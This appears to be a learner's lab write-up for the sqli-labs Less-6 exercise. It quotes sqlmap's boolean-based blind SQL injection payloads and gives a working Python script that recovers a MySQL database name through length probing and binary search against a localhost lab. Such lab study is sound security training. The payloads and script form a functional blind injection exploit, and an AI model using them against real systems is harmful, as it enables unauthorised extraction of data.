Boolean-based blind injection script - sqli-labs Less-6

I wrote this after running sqlmap against the lab: I looked at the payloads in its log and wanted to reproduce them myself.

However, sqlmap does not seem to determine the length of the database name first; it starts testing from the first character directly. It is also possible that the length payload was mixed in with the earlier fingerprinting requests and I did not notice. The part of the payloads that determines the database name is as follows:

ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>96#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>112#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>120#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>114#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>115#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>64#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>96#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>112#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>104#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>100#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>102#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>101#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>64#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>96#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>112#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>104#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>100#

Roughly: DATABASE() is cast to CHAR, IFNULL substitutes a space (0x20) if it is NULL, and MID() takes the x-th character. The greater-than comparison then narrows down the range of that character's ASCII value until the exact value is determined.

If the comparison holds, the AND condition is true, the page renders normally, and a yellow line "You are in..........." is shown.

My own script works by first determining the length of the database name, then reading the name with binary search. Ha, I call it a reproduction, but it is not the same as what sqlmap does. Too lazy to dig through its source.

import requests

BASE = 'http://127.0.0.1/sqli-labs-master/Less-6/?id='
TRUE_MARKER = 'You are in...........'   # yellow line shown when the injected condition is true


def getlength():
    # Probe lengths 1..9; return None if none of them matched
    i = 1
    while i < 10:
        url = BASE + '1" and (select length(database()))={} --+'.format(i)
        r = requests.get(url)
        if TRUE_MARKER in r.text:
            return i
        i += 1
    return None


if __name__ == "__main__":
    # chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    payload = '1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),{},1))>{}--+'
    n = getlength()
    if n is None:
        raise SystemExit('could not determine the database name length')
    databasename = ''
    for i in range(1, n + 1):
        # Binary search on the ASCII value: min_ascii is an exclusive lower bound,
        # max_ascii an inclusive upper bound, so the answer is max_ascii when they meet.
        # 64 rather than 65 so that 'A' (65) itself can be found.
        min_ascii = 64
        max_ascii = 122
        while max_ascii - min_ascii > 1:
            mid = (max_ascii + min_ascii) // 2
            r = requests.get(BASE + payload.format(i, mid))
            if TRUE_MARKER in r.text:
                min_ascii = mid      # ORD(char) > mid
            else:
                max_ascii = mid      # ORD(char) <= mid
        databasename += chr(max_ascii)
    print(databasename)
